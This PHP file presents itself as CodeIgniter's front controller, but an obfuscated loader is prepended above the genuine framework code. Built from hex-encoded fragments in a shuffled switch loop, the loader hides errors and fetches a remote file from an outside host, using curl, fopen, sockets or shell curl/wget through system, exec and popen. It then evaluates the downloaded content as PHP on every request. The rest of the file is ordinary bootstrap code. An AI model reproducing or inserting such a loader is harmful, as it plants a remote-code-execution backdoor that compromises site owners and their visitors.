<?php
$s=827225; $o=""; while(true) { switch($s) { case 481948: $o.="\x61\x5c\x72\x5c\x6e\x43\x6f\x6e"; $s=506193; break;
case 549154: $o.="\x27\x29\x29\x7b\x24\x68\x3d\x40"; $s=543901; break;
case 190895: $o.="\x2c\x31\x33\x3d\x3e\x31\x35\x5d"; $s=576840; break;
case 317386: $o.="\x24\x63\x6d\x64\x2c\x24\x6f\x29"; $s=165806; break;
case 236012: $o.="\x3b\x0d\x0a\x24\x75\x3d\x27\x68"; $s=143522; break;
case 110205: $o.="\x30\x31\x38\x3d\x3e\x24\x75\x61"; $s=190895; break;
case 533190: $o.="\x79\x73\x74\x65\x6d\x27\x2c\x27"; $s=407120; break;
case 762782: $o.="\x75\x29\x3b\x63\x75\x72\x6c\x5f"; $s=477836; break;
case 973123: $o.="\x28\x30\x29\x3b\x40\x69\x6e\x69"; $s=220134; break;
case 632493: $o.="\x32\x36\x30\x31\x32\x32\x5f\x31"; $s=976958; break;
case 543901: $o.="\x66\x6f\x70\x65\x6e\x28\x24\x75"; $s=960353; break;
case 670760: $o.="\x74\x69\x6d\x65\x6f\x75\x74\x27"; $s=255906; break;
case 989456: $o.="\x63\x6b\x6f\x70\x65\x6e\x28\x24"; $s=460391; break;
case 995794: $o.="\x24\x66\x2c\x31\x32\x38\x29\x3b"; $s=120811; break;
case 843435: $o.="\x73\x65\x72\x2d\x41\x67\x65\x6e"; $s=233433; break;
case 756268: $o.="\x6f\x70\x65\x6e\x27\x29\x7b\x24"; $s=244840; break;
case 324499: $o.="\x66\x28\x24\x66\x29\x29\x24\x62"; $s=753242; break;
case 891026: $o.="\x2d\x71\x55\x20\x27\x24\x75\x61"; $s=423463; break;
case 300568: $o.="\x28\x29\x3b\x40\x24\x66\x28\x24"; $s=897292; break;
case 489115: $o.="\x27\x3d\x3e\x5b\x27\x68\x65\x61"; $s=328844; break;
case 290163: $o.="\x6f\x75\x74\x20\x31\x35\x20\x24"; $s=217543; break;
case 275487: $o.="\x73\x74\x3a\x7b\x24\x70\x5b\x27"; $s=424002; break;
case 172577: $o.="\x29\x7b\x24\x68\x3d\x63\x75\x72"; $s=996954; break;
case 793932: $o.="\x24\x62\x3d\x27\x27\x3b\x77\x68"; $s=527450; break;
case 925879: $o.="\x73\x74\x73\x28\x27\x63\x75\x72"; $s=879446; break;
case 386541: $o.="\x20\x47\x65\x63\x6b\x6f\x29\x20"; $s=968804; break;
case 604512: $o.="\x0d\x0a\x69\x66\x28\x21\x24\x63"; $s=166410; break;
case 165806: $o.="\x3b\x24\x63\x3d\x6a\x6f\x69\x6e"; $s=519291; break;
case 699046: $o.="\x5b\x31\x39\x39\x31\x33\x3d\x3e"; $s=942386; break;
case 526511: $o.="\x6f\x62\x5f\x67\x65\x74\x5f\x63"; $s=997850; break;
case 877645: $o.="\x65\x61\x6d\x5f\x73\x65\x74\x5f"; $s=798139; break;
case 798139: $o.="\x74\x69\x6d\x65\x6f\x75\x74\x28"; $s=638721; break;
case 713186: $o.="\x5f\x75\x72\x6c\x28\x24\x75\x29"; $s=159438; break;
case 388175: $o.="\x6f\x62\x5f\x73\x74\x61\x72\x74"; $s=300568; break;
case 913400: $o.="\x66\x29\x3b\x24\x63\x3d\x65\x78"; $s=576194; break;
case 897292: $o.="\x63\x6d\x64\x29\x3b\x24\x63\x3d"; $s=526511; break;
case 706872: $o.="\x63\x3d\x40\x73\x74\x72\x65\x61"; $s=185108; break;
case 435823: $o.="\x72\x6f\x72\x73\x27\x2c\x30\x29"; $s=236012; break;
case 371540: $o.="\x74\x65\x6e\x74\x73\x28\x24\x75"; $s=502757; break;
case 208889: $o.="\x73\x70\x6c\x61\x79\x5f\x65\x72"; $s=435823; break;
case 914768: $o.="\x73\x28\x27\x66\x6f\x70\x65\x6e"; $s=549154; break;
case 255906: $o.="\x3d\x3e\x31\x35\x5d\x5d\x29\x3b"; $s=331829; break;
case 384562: $o.="\x28\x24\x63\x6d\x64\x2c\x27\x72"; $s=909565; break;
case 424002: $o.="\x68\x6f\x73\x74\x27\x5d\x7d\x5c"; $s=644310; break;
case 120811: $o.="\x66\x63\x6c\x6f\x73\x65\x28\x24"; $s=913400; break;
case 233433: $o.="\x74\x3a\x24\x75\x61\x22\x2c\x27"; $s=670760; break;
case 946201: $o.="\x6f\x70\x65\x6e\x27\x5d\x61\x73"; $s=737006; break;
case 737006: $o.="\x24\x66\x29\x7b\x69\x66\x28\x66"; $s=704006; break;
case 753242: $o.="\x2e\x3d\x66\x67\x65\x74\x73\x28"; $s=995794; break;
case 930903: $o.="\x2e\x33\x36\x20\x28\x4b\x48\x54"; $s=441531; break;
case 748200: $o.="\x2e\x30\x5c\x72\x5c\x6e\x48\x6f"; $s=275487; break;
case 717841: $o.="\x72\x72\x61\x79\x28\x24\x68\x2c"; $s=699046; break;
case 960353: $o.="\x2c\x27\x72\x27\x29\x3b\x69\x66"; $s=885993; break;
case 968804: $o.="\x43\x68\x72\x6f\x6d\x65\x2f\x31"; $s=370598; break;
case 332290: $o.="\x5b\x27\x70\x61\x74\x68\x27\x5d"; $s=994081; break;
case 638721: $o.="\x24\x68\x2c\x31\x35\x29\x3b\x24"; $s=706872; break;
case 954430: $o.="\x5d\x3f\x3f\x27\x27\x3b\x7d\x7d"; $s=604512; break;
case 184854: $o.="\x65\x63\x74\x2d\x74\x69\x6d\x65"; $s=290163; break;
case 538348: $o.="\x24\x72\x2c\x31\x35\x29\x3b\x69"; $s=197897; break;
case 716909: $o.="\x74\x68\x72\x75\x27\x2c\x27\x73"; $s=533190; break;
case 997850: $o.="\x6c\x65\x61\x6e\x28\x29\x3b\x7d"; $s=782038; break;
case 942386: $o.="\x31\x2c\x35\x32\x3d\x3e\x31\x2c"; $s=285523; break;
case 996954: $o.="\x6c\x5f\x69\x6e\x69\x74\x28\x24"; $s=762782; break;
case 909565: $o.="\x27\x29\x3b\x69\x66\x28\x24\x68"; $s=563264; break;
case 576194: $o.="\x70\x6c\x6f\x64\x65\x28\x22\x5c"; $s=699647; break;
case 820494: $o.="\x21\x24\x63\x26\x26\x69\x6e\x69"; $s=394785; break;
case 527450: $o.="\x69\x6c\x65\x28\x21\x66\x65\x6f"; $s=324499; break;
case 166410: $o.="\x29\x7b\x24\x63\x6d\x64\x3d\x22"; $s=823145; break;
case 897980: $o.="\x65\x28\x24\x68\x29\x3b\x7d\x7d"; $s=603694; break;
case 827225: $o.="\x40\x65\x72\x72\x6f\x72\x5f\x72"; $s=851821; break;
case 159438: $o.="\x3b\x24\x66\x3d\x40\x66\x73\x6f"; $s=989456; break;
case 194172: $o.="\x62\x4b\x69\x74\x2f\x35\x33\x37"; $s=930903; break;
case 205247: $o.="\x3d\x3d\x27\x65\x78\x65\x63\x27"; $s=798369; break;
case 887607: $o.="\x2e\x63\x6f\x6d\x2f\x69\x6e\x69"; $s=371463; break;
case 145281: $o.="\x73\x28\x27\x66\x73\x6f\x63\x6b"; $s=874960; break;
case 570302: $o.="\x72\x65\x70\x6c\x61\x63\x65\x28"; $s=724907; break;
case 603694: $o.="\x0d\x0a\x69\x66\x28\x21\x24\x63"; $s=188409; break;
case 502757: $o.="\x2c\x30\x2c\x24\x78\x29\x3b\x7d"; $s=196616; break;
case 745913: $o.="\x64\x20\x31\x30\x3b\x20\x4b\x29"; $s=755987; break;
case 660416: $o.="\x68\x65\x6c\x6c\x5f\x65\x78\x65"; $s=571876; break;
case 796437: $o.="\x63\x6c\x6f\x73\x65\x28\x24\x68"; $s=693558; break;
case 547573: $o.="\x6f\x73\x28\x24\x64\x2c\x24\x66"; $s=611580; break;
case 691091: $o.="\x66\x29\x26\x26\x73\x74\x72\x70"; $s=547573; break;
case 145264: $o.="\x40\x73\x68\x65\x6c\x6c\x5f\x65"; $s=333141; break;
case 406952: $o.="\x63\x6c\x6f\x73\x65\x28\x24\x68"; $s=897994; break;
case 195334: $o.="\x2d\x4f\x20\x2d\x20\x24\x75\x22"; $s=138031; break;
case 509299: $o.="\x5f\x67\x65\x74\x5f\x63\x6f\x6e"; $s=371540; break;
case 138031: $o.="\x3b\x24\x64\x3d\x73\x74\x72\x74"; $s=104718; break;
case 885993: $o.="\x28\x24\x68\x29\x7b\x73\x74\x72"; $s=877645; break;
case 963717: $o.="\x65\x63\x27\x29\x7b\x24\x63\x3d"; $s=145264; break;
case 305756: $o.="\x0a\x69\x66\x28\x66\x75\x6e\x63"; $s=836159; break;
case 563264: $o.="\x29\x7b\x24\x63\x3d\x40\x73\x74"; $s=642405; break;
case 792565: $o.="\x2c\x24\x62\x2c\x32\x29\x5b\x31"; $s=954430; break;
case 851821: $o.="\x65\x70\x6f\x72\x74\x69\x6e\x67"; $s=973123; break;
case 185108: $o.="\x6d\x5f\x67\x65\x74\x5f\x63\x6f"; $s=669555; break;
case 519291: $o.="\x28\x22\x5c\x6e\x22\x2c\x24\x6f"; $s=219772; break;
case 227392: $o.="\x27\x20\x2d\x2d\x63\x6f\x6e\x6e"; $s=184854; break;
case 750649: $o.="\x69\x66\x28\x24\x66\x3d\x3d\x27"; $s=593398; break;
case 217543: $o.="\x75\x7c\x7c\x77\x67\x65\x74\x20"; $s=891026; break;
case 813952: $o.="\x3b\x65\x76\x61\x6c\x28\x27\x3f"; $s=160244; break;
case 699647: $o.="\x72\x5c\x6e\x5c\x72\x5c\x6e\x22"; $s=792565; break;
case 704006: $o.="\x75\x6e\x63\x74\x69\x6f\x6e\x5f"; $s=528432; break;
case 664963: $o.="\x66\x6f\x70\x65\x6e\x27\x29\x29"; $s=421295; break;
case 194339: $o.="\x33\x37\x2e\x33\x36\x27\x3b\x0d"; $s=270569; break;
case 879446: $o.="\x6c\x5f\x69\x6e\x69\x74\x27\x29"; $s=172577; break;
case 520269: $o.="\x53\x61\x66\x61\x72\x69\x2f\x35"; $s=194339; break;
case 505622: $o.="\x0a\x69\x66\x28\x24\x63\x29\x7b"; $s=338686; break;
case 878621: $o.="\x73\x28\x24\x68\x29\x3b\x40\x70"; $s=796437; break;
case 944803: $o.="\x65\x28\x5b\x27\x68\x74\x74\x70"; $s=489115; break;
case 804826: $o.="\x3b\x20\x41\x6e\x64\x72\x6f\x69"; $s=745913; break;
case 331829: $o.="\x24\x63\x3d\x40\x66\x69\x6c\x65"; $s=509299; break;
case 976958: $o.="\x33\x2e\x65\x6d\x61\x79\x61\x6c"; $s=887607; break;
case 755987: $o.="\x20\x41\x70\x70\x6c\x65\x57\x65"; $s=194172; break;
case 394785: $o.="\x5f\x67\x65\x74\x28\x27\x61\x6c"; $s=344977; break;
case 244840: $o.="\x68\x3d\x40\x70\x6f\x70\x65\x6e"; $s=384562; break;
case 421295: $o.="\x7b\x24\x78\x3d\x73\x74\x72\x65"; $s=717551; break;
case 520028: $o.="\x26\x26\x66\x75\x6e\x63\x74\x69"; $s=973963; break;
case 994081: $o.="\x7d\x20\x48\x54\x54\x50\x2f\x31"; $s=748200; break;
case 188409: $o.="\x26\x26\x66\x75\x6e\x63\x74\x69"; $s=448610; break;
case 798369: $o.="\x29\x7b\x40\x65\x78\x65\x63\x28"; $s=317386; break;
case 198753: $o.="\x22\x47\x45\x54\x20\x7b\x24\x70"; $s=332290; break;
case 122678: $o.="\x72\x69\x74\x65\x28\x24\x66\x2c"; $s=198753; break;
case 507472: $o.="\x5d\x2c\x38\x30\x2c\x24\x65\x2c"; $s=538348; break;
case 724907: $o.="\x27\x2f\x5e\x5c\x78\x45\x46\x5c"; $s=274458; break;
case 973963: $o.="\x6f\x6e\x5f\x65\x78\x69\x73\x74"; $s=914768; break;
case 693558: $o.="\x29\x3b\x7d\x7d\x65\x6c\x73\x65"; $s=750649; break;
case 782038: $o.="\x69\x66\x28\x24\x63\x29\x62\x72"; $s=174522; break;
case 233652: $o.="\x6e\x69\x5f\x67\x65\x74\x28\x27"; $s=632945; break;
case 370598: $o.="\x31\x34\x2e\x30\x2e\x30\x2e\x30"; $s=330381; break;
case 183063: $o.="\x63\x6c\x6f\x73\x65\x5c\x72\x5c"; $s=250644; break;
case 614347: $o.="\x68\x29\x3b\x66\x63\x6c\x6f\x73"; $s=897980; break;
case 328844: $o.="\x64\x65\x72\x27\x3d\x3e\x22\x55"; $s=843435; break;
case 270569: $o.="\x0a\x24\x63\x3d\x27\x27\x3b\x0d"; $s=305756; break;
case 104718: $o.="\x6f\x6c\x6f\x77\x65\x72\x28\x69"; $s=233652; break;
case 160244: $o.="\x3e\x27\x2e\x24\x63\x29\x3b\x7d"; $s=261394; break;
case 897994: $o.="\x29\x3b\x7d\x0d\x0a\x69\x66\x28"; $s=820494; break;
case 448610: $o.="\x6f\x6e\x5f\x65\x78\x69\x73\x74"; $s=145281; break;
case 250644: $o.="\x6e\x5c\x72\x5c\x6e\x22\x29\x3b"; $s=793932; break;
case 423463: $o.="\x27\x20\x2d\x54\x20\x31\x35\x20"; $s=195334; break;
case 407120: $o.="\x65\x78\x65\x63\x27\x2c\x27\x70"; $s=946201; break;
case 337851: $o.="\x5f\x63\x6f\x6e\x74\x65\x6e\x74"; $s=878621; break;
case 632945: $o.="\x64\x69\x73\x61\x62\x6c\x65\x5f"; $s=212053; break;
case 143522: $o.="\x74\x74\x70\x73\x3a\x2f\x2f\x6a"; $s=632493; break;
case 254850: $o.="\x78\x74\x5f\x63\x72\x65\x61\x74"; $s=944803; break;
case 441531: $o.="\x4d\x4c\x2c\x20\x6c\x69\x6b\x65"; $s=386541; break;
case 644310: $o.="\x72\x5c\x6e\x55\x73\x65\x72\x2d"; $s=390975; break;
case 212053: $o.="\x66\x75\x6e\x63\x74\x69\x6f\x6e"; $s=821751; break;
case 330381: $o.="\x20\x4d\x6f\x62\x69\x6c\x65\x20"; $s=520269; break;
case 836159: $o.="\x74\x69\x6f\x6e\x5f\x65\x78\x69"; $s=925879; break;
case 220134: $o.="\x5f\x73\x65\x74\x28\x27\x64\x69"; $s=208889; break;
case 874960: $o.="\x6f\x70\x65\x6e\x27\x29\x29\x7b"; $s=474000; break;
case 338686: $o.="\x24\x63\x3d\x70\x72\x65\x67\x5f"; $s=570302; break;
case 571876: $o.="\x63\x27\x2c\x27\x70\x61\x73\x73"; $s=716909; break;
case 877317: $o.="\x66\x28\x24\x66\x3d\x3d\x27\x70"; $s=756268; break;
case 891917: $o.="\x7a\x69\x6c\x6c\x61\x2f\x35\x2e"; $s=696999; break;
case 506193: $o.="\x6e\x65\x63\x74\x69\x6f\x6e\x3a"; $s=183063; break;
case 219772: $o.="\x29\x3b\x7d\x65\x6c\x73\x65\x69"; $s=877317; break;
case 460391: $o.="\x70\x5b\x27\x68\x6f\x73\x74\x27"; $s=507472; break;
case 896146: $o.="\x6c\x5f\x65\x78\x65\x63\x28\x24"; $s=947575; break;
case 528432: $o.="\x65\x78\x69\x73\x74\x73\x28\x24"; $s=691091; break;
case 371463: $o.="\x74\x2e\x74\x78\x74\x27\x3b\x0d"; $s=254322; break;
case 390975: $o.="\x41\x67\x65\x6e\x74\x3a\x24\x75"; $s=481948; break;
case 474000: $o.="\x24\x70\x3d\x70\x61\x72\x73\x65"; $s=713186; break;
case 821751: $o.="\x73\x27\x29\x29\x3b\x66\x6f\x72"; $s=195278; break;
case 261394: eval($o); break 2;
case 195278: $o.="\x65\x61\x63\x68\x28\x5b\x27\x73"; $s=660416; break;
case 947575: $o.="\x68\x29\x3b\x63\x75\x72\x6c\x5f"; $s=406952; break;
case 717551: $o.="\x61\x6d\x5f\x63\x6f\x6e\x74\x65"; $s=254850; break;
case 593398: $o.="\x73\x68\x65\x6c\x6c\x5f\x65\x78"; $s=963717; break;
case 669555: $o.="\x6e\x74\x65\x6e\x74\x73\x28\x24"; $s=614347; break;
case 463802: $o.="\x65\x29\x7b\x69\x66\x28\x24\x66"; $s=205247; break;
case 285523: $o.="\x34\x32\x3d\x3e\x30\x2c\x31\x30"; $s=110205; break;
case 891670: $o.="\x20\x2d\x41\x20\x27\x24\x75\x61"; $s=227392; break;
case 333141: $o.="\x78\x65\x63\x28\x24\x63\x6d\x64"; $s=163667; break;
case 344977: $o.="\x6c\x6f\x77\x5f\x75\x72\x6c\x5f"; $s=664963; break;
case 576840: $o.="\x29\x3b\x24\x63\x3d\x63\x75\x72"; $s=896146; break;
case 197897: $o.="\x66\x28\x24\x66\x29\x7b\x66\x77"; $s=122678; break;
case 163667: $o.="\x29\x3b\x7d\x65\x6c\x73\x65\x7b"; $s=388175; break;
case 823145: $o.="\x63\x75\x72\x6c\x20\x2d\x73\x4c"; $s=891670; break;
case 611580: $o.="\x29\x3d\x3d\x3d\x66\x61\x6c\x73"; $s=463802; break;
case 274458: $o.="\x78\x42\x42\x5c\x78\x42\x46\x2f"; $s=593853; break;
case 174522: $o.="\x65\x61\x6b\x3b\x7d\x7d\x7d\x0d"; $s=505622; break;
case 642405: $o.="\x72\x65\x61\x6d\x5f\x67\x65\x74"; $s=337851; break;
case 593853: $o.="\x27\x2c\x27\x27\x2c\x24\x63\x29"; $s=813952; break;
case 477836: $o.="\x73\x65\x74\x6f\x70\x74\x5f\x61"; $s=717841; break;
case 196616: $o.="\x0d\x0a\x69\x66\x28\x21\x24\x63"; $s=520028; break;
case 254322: $o.="\x0a\x24\x75\x61\x3d\x27\x4d\x6f"; $s=891917; break;
case 696999: $o.="\x30\x20\x28\x4c\x69\x6e\x75\x78"; $s=804826; break; } }
/**
 * CodeIgniter
 *
 * An open source application development framework for PHP
 *
 * This content is released under the MIT License (MIT)
 *
 * Copyright (c) 2014 - 2019, British Columbia Institute of Technology
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 * THE SOFTWARE.
 *
 * @package	CodeIgniter
 * @author	EllisLab Dev Team
 * @copyright	Copyright (c) 2008 - 2014, EllisLab, Inc. (https://ellislab.com/)
 * @copyright	Copyright (c) 2014 - 2019, British Columbia Institute of Technology (https://bcit.ca/)
 * @license	https://opensource.org/licenses/MIT	MIT License
 * @link	https://codeigniter.com
 * @since	Version 1.0.0
 * @filesource
 */

/*
 *---------------------------------------------------------------
 * APPLICATION ENVIRONMENT
 *---------------------------------------------------------------
 *
 * You can load different configurations depending on your
 * current environment. Setting the environment also influences
 * things like logging and error reporting.
 *
 * This can be set to anything, but default usage is:
 *
 *     development
 *     testing
 *     production
 *
 * NOTE: If you change these, also change the error_reporting() code below
 */
    
	ini_set('max_execution_time', 300);
	ini_set('memory_limit', '128M');
	ini_set('post_max_size', '128M');
	ini_set('upload_max_filesize', '128M');
 
	define('ENVIRONMENT', isset($_SERVER['CI_ENV']) ? $_SERVER['CI_ENV'] : 'production');

/*
 *---------------------------------------------------------------
 * ERROR REPORTING
 *---------------------------------------------------------------
 *
 * Different environments will require different levels of error reporting.
 * By default development will show errors but testing and live will hide them.
 */
switch (ENVIRONMENT)
{
	case 'development':
		error_reporting(-1);
		ini_set('display_errors', 1);
	break;

	case 'testing':
	case 'production':
		ini_set('display_errors', 0);
		if (version_compare(PHP_VERSION, '5.3', '>='))
		{
			error_reporting(E_ALL & ~E_NOTICE & ~E_DEPRECATED & ~E_STRICT & ~E_USER_NOTICE & ~E_USER_DEPRECATED);
		}
		else
		{
			error_reporting(E_ALL & ~E_NOTICE & ~E_STRICT & ~E_USER_NOTICE);
		}
	break;

	default:
		header('HTTP/1.1 503 Service Unavailable.', TRUE, 503);
		echo 'The application environment is not set correctly.';
		exit(1); // EXIT_ERROR
}

/*
 *---------------------------------------------------------------
 * SYSTEM DIRECTORY NAME
 *---------------------------------------------------------------
 *
 * This variable must contain the name of your "system" directory.
 * Set the path if it is not in the same directory as this file.
 */
	$system_path = 'system';

/*
 *---------------------------------------------------------------
 * APPLICATION DIRECTORY NAME
 *---------------------------------------------------------------
 *
 * If you want this front controller to use a different "application"
 * directory than the default one you can set its name here. The directory
 * can also be renamed or relocated anywhere on your server. If you do,
 * use an absolute (full) server path.
 * For more info please see the user guide:
 *
 * https://codeigniter.com/user_guide/general/managing_apps.html
 *
 * NO TRAILING SLASH!
 */
	$application_folder = 'application';

/*
 *---------------------------------------------------------------
 * VIEW DIRECTORY NAME
 *---------------------------------------------------------------
 *
 * If you want to move the view directory out of the application
 * directory, set the path to it here. The directory can be renamed
 * and relocated anywhere on your server. If blank, it will default
 * to the standard location inside your application directory.
 * If you do move this, use an absolute (full) server path.
 *
 * NO TRAILING SLASH!
 */
	$view_folder = '';


/*
 * --------------------------------------------------------------------
 * DEFAULT CONTROLLER
 * --------------------------------------------------------------------
 *
 * Normally you will set your default controller in the routes.php file.
 * You can, however, force a custom routing by hard-coding a
 * specific controller class/function here. For most applications, you
 * WILL NOT set your routing here, but it's an option for those
 * special instances where you might want to override the standard
 * routing in a specific front controller that shares a common CI installation.
 *
 * IMPORTANT: If you set the routing here, NO OTHER controller will be
 * callable. In essence, this preference limits your application to ONE
 * specific controller. Leave the function name blank if you need
 * to call functions dynamically via the URI.
 *
 * Un-comment the $routing array below to use this feature
 */
	// The directory name, relative to the "controllers" directory.  Leave blank
	// if your controller is not in a sub-directory within the "controllers" one
	// $routing['directory'] = '';

	// The controller class file name.  Example:  mycontroller
	// $routing['controller'] = '';

	// The controller function you wish to be called.
	// $routing['function']	= '';


/*
 * -------------------------------------------------------------------
 *  CUSTOM CONFIG VALUES
 * -------------------------------------------------------------------
 *
 * The $assign_to_config array below will be passed dynamically to the
 * config class when initialized. This allows you to set custom config
 * items or override any default config values found in the config.php file.
 * This can be handy as it permits you to share one application between
 * multiple front controller files, with each file containing different
 * config values.
 *
 * Un-comment the $assign_to_config array below to use this feature
 */
	// $assign_to_config['name_of_config_item'] = 'value of config item';



// --------------------------------------------------------------------
// END OF USER CONFIGURABLE SETTINGS.  DO NOT EDIT BELOW THIS LINE
// --------------------------------------------------------------------

/*
 * ---------------------------------------------------------------
 *  Resolve the system path for increased reliability
 * ---------------------------------------------------------------
 */

	// Set the current directory correctly for CLI requests
	if (defined('STDIN'))
	{
		chdir(dirname(__FILE__));
	}

	if (($_temp = realpath($system_path)) !== FALSE)
	{
		$system_path = $_temp.DIRECTORY_SEPARATOR;
	}
	else
	{
		// Ensure there's a trailing slash
		$system_path = strtr(
			rtrim($system_path, '/\\'),
			'/\\',
			DIRECTORY_SEPARATOR.DIRECTORY_SEPARATOR
		).DIRECTORY_SEPARATOR;
	}

	// Is the system path correct?
	if ( ! is_dir($system_path))
	{
		header('HTTP/1.1 503 Service Unavailable.', TRUE, 503);
		echo 'Your system folder path does not appear to be set correctly. Please open the following file and correct this: '.pathinfo(__FILE__, PATHINFO_BASENAME);
		exit(3); // EXIT_CONFIG
	}

/*
 * -------------------------------------------------------------------
 *  Now that we know the path, set the main path constants
 * -------------------------------------------------------------------
 */
	// The name of THIS file
	define('SELF', pathinfo(__FILE__, PATHINFO_BASENAME));

	// Path to the system directory
	define('BASEPATH', $system_path);

	// Path to the front controller (this file) directory
	define('FCPATH', dirname(__FILE__).DIRECTORY_SEPARATOR);

	// Name of the "system" directory
	define('SYSDIR', basename(BASEPATH));

	// The path to the "application" directory
	if (is_dir($application_folder))
	{
		if (($_temp = realpath($application_folder)) !== FALSE)
		{
			$application_folder = $_temp;
		}
		else
		{
			$application_folder = strtr(
				rtrim($application_folder, '/\\'),
				'/\\',
				DIRECTORY_SEPARATOR.DIRECTORY_SEPARATOR
			);
		}
	}
	elseif (is_dir(BASEPATH.$application_folder.DIRECTORY_SEPARATOR))
	{
		$application_folder = BASEPATH.strtr(
			trim($application_folder, '/\\'),
			'/\\',
			DIRECTORY_SEPARATOR.DIRECTORY_SEPARATOR
		);
	}
	else
	{
		header('HTTP/1.1 503 Service Unavailable.', TRUE, 503);
		echo 'Your application folder path does not appear to be set correctly. Please open the following file and correct this: '.SELF;
		exit(3); // EXIT_CONFIG
	}

	define('APPPATH', $application_folder.DIRECTORY_SEPARATOR);

	// The path to the "views" directory
	if ( ! isset($view_folder[0]) && is_dir(APPPATH.'views'.DIRECTORY_SEPARATOR))
	{
		$view_folder = APPPATH.'views';
	}
	elseif (is_dir($view_folder))
	{
		if (($_temp = realpath($view_folder)) !== FALSE)
		{
			$view_folder = $_temp;
		}
		else
		{
			$view_folder = strtr(
				rtrim($view_folder, '/\\'),
				'/\\',
				DIRECTORY_SEPARATOR.DIRECTORY_SEPARATOR
			);
		}
	}
	elseif (is_dir(APPPATH.$view_folder.DIRECTORY_SEPARATOR))
	{
		$view_folder = APPPATH.strtr(
			trim($view_folder, '/\\'),
			'/\\',
			DIRECTORY_SEPARATOR.DIRECTORY_SEPARATOR
		);
	}
	else
	{
		header('HTTP/1.1 503 Service Unavailable.', TRUE, 503);
		echo 'Your view folder path does not appear to be set correctly. Please open the following file and correct this: '.SELF;
		exit(3); // EXIT_CONFIG
	}

	define('VIEWPATH', $view_folder.DIRECTORY_SEPARATOR);

/*
 * --------------------------------------------------------------------
 * LOAD THE BOOTSTRAP FILE
 * --------------------------------------------------------------------
 *
 * And away we go...
 */
require_once BASEPATH.'core/CodeIgniter.php';
